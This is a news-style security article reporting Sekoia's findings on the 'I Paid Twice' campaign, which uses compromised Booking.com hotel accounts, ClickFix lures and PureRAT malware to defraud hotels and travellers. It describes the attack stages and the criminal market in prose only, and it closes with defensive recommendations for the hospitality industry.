Phishing Campaign “I Paid Twice” Targets Booking.com Hotels and Guests

A newly discovered cybercrime campaign has been targeting Booking.com hotel partners and their customers in a sophisticated global phishing operation dubbed “I Paid Twice.” 

According to Sekoia researchers, the campaign leverages compromised hotel accounts and advanced social engineering techniques to defraud both businesses and travelers, often convincing victims to unknowingly pay for reservations twice.

Inside the “I Paid Twice” Attack

Sekoia analysts traced the campaign back to earlier infostealer infections that infiltrated hotel networks and stole professional credentials. 

These stolen credentials granted threat actors access to hotel accounts on booking platforms such as Booking.com and Expedia, enabling them to impersonate legitimate hotel staff and contact guests directly.

Attackers sent emails or WhatsApp messages using authentic reservation details, creating a convincing sense of legitimacy. 

Victims were told that a “bank verification issue” required them to reconfirm their payment, often through a phishing link designed to mimic Booking.com’s interface. 

The link redirected to a fraudulent payment portal hosted on infrastructure located in Russia and operated by a suspected BulletProof hosting provider.

This campaign has been active since April 2025, with multiple reports of defrauded guests across Europe, Asia, and North America. 

Once customers entered their banking details, attackers exfiltrated funds directly or sold the harvested credentials on cybercrime forums.

The Attack Stages

Sekoia’s analysis uncovered that the initial compromise often originated from malicious emails sent to hotel administrators. 

These emails imitated Booking.com notifications and contained URLs that exploited a ClickFix social engineering technique.

The attack unfolded in several stages:

1. Redirection and deception: The malicious link redirected through a network of compromised domains to conceal the attacker’s infrastructure.
2. Fake CAPTCHA execution: Victims were prompted to copy and paste a “verification command” into PowerShell, unwittingly executing malware.
3. Payload delivery: The PowerShell command downloaded a ZIP archive containing a malicious executable and DLL files. These files initiated the PureRAT malware infection, granting remote access, keylogging, and data exfiltration capabilities.

Once compromised, hotel systems were used to send further phishing emails or sell the stolen credentials as Booking.com extranet logs in underground forums.

A Thriving Cybercrime Ecosystem

The researchers found a highly organized cybercrime market dedicated to exploiting the hospitality industry. 

On Russian-speaking forums such as LolzTeam and Exploit[.]in, cybercriminals openly trade stolen Booking.com credentials, phishing kits, and log checkers that validate the authenticity of compromised accounts.

Some threat actors, including a user known as moderator_booking, advertise services buying or selling access to Booking.com, Expedia, and Airbnb accounts. 

These logs — bundles of credentials, cookies, and system data harvested by malware — can sell for $30 to over $5,000, depending on account value and reservation volume. 

This growing ecosystem reflects a professionalization of cyber fraud targeting travel platforms, mirroring trends seen in banking and cryptocurrency theft.

The Role of PureRAT Malware

At the technical level, PureRAT (PureHVNC) plays a central role in maintaining persistence and remote control. 

Sold as a Malware-as-a-Service (MaaS) tool, PureRAT enables full system access, webcam and microphone capture, credential theft, and file exfiltration. 

Once deployed, it communicates with command-and-control servers over encrypted TCP/TLS connections, sending victim data such as system info, antivirus status, and screenshots.

Its modular plugin system allows attackers to expand functionality on demand — loading remote desktop tools, data theft modules, or in-memory executors for fileless persistence. 

Building a Stronger Defense

Defending against operations like “I Paid Twice” requires a multi-layered security approach spanning prevention, detection, and response. Some steps organizations can take include:

• Tighten access controls: Restrict admin access, enable MFA, and revoke compromised credentials fast.
• Train staff on phishing: Teach employees to spot fake Booking.com messages and avoid unsafe links or commands.
• Monitor for anomalies: Use endpoint tools to detect suspicious PowerShell, registry, or DLL activity.
• Review integrations: Audit APIs and data connections to enforce least-privilege access.
• Secure email and networks: Enable SPF, DKIM, and DMARC; separate admin systems from guest Wi-Fi.
• Use threat intelligence: Apply PowerShell and Sysmon rules to flag abnormal file or registry behavior.

These steps help reduce risk and build cyber resilience against similar attacks.

A Growing Threat to the Travel Industry

The “I Paid Twice” campaign underscores how criminal groups are weaponizing trust in global platforms and targeting hospitality. 

Sekoia warns that such campaigns are unlikely to disappear soon. 

As long as infostealer malware and stolen credentials remain cheap and accessible, cybercriminals will continue exploiting the intersection between human error and automated trust systems.

This growing abuse of digital trust highlights why adopting a zero-trust approach is essential to limit access, verify every connection, and contain breaches before they spread.